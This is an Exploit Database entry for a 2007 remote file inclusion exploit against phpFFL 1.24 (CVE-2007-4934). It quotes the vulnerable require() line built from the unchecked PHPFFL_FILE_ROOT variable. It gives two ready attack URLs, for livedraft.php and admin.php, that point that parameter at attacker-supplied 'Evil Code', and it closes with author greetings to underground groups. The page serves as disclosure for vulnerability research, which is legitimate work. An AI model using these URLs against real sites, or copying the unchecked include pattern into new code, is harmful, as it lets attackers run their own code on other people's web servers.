Exploit Database - Logo

phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion

EDB-ID: 4406 Author: Dj7xpl Published: 2007-09-14
CVE: CVE-2007-4934 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
# Author   :  Dj7xpl
# Contact  :  Dj7xpl@r00t.ir
# Dawnload :  http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ   :  Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
 

[[Remote]]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""

# milw0rm.com [2007-09-14]

Related Exploits

Trying to match CVEs (1): CVE-2007-4934
Trying to match OSVDBs (2): 37085, 37086
Trying to match setup file: ca5cfcecb4e40e6bd46f9c94f7f5a68f
Other Possible E-DB Search Terms: phpFFL 1.24,  phpFFL
Date D V Title Author
No matches
Menu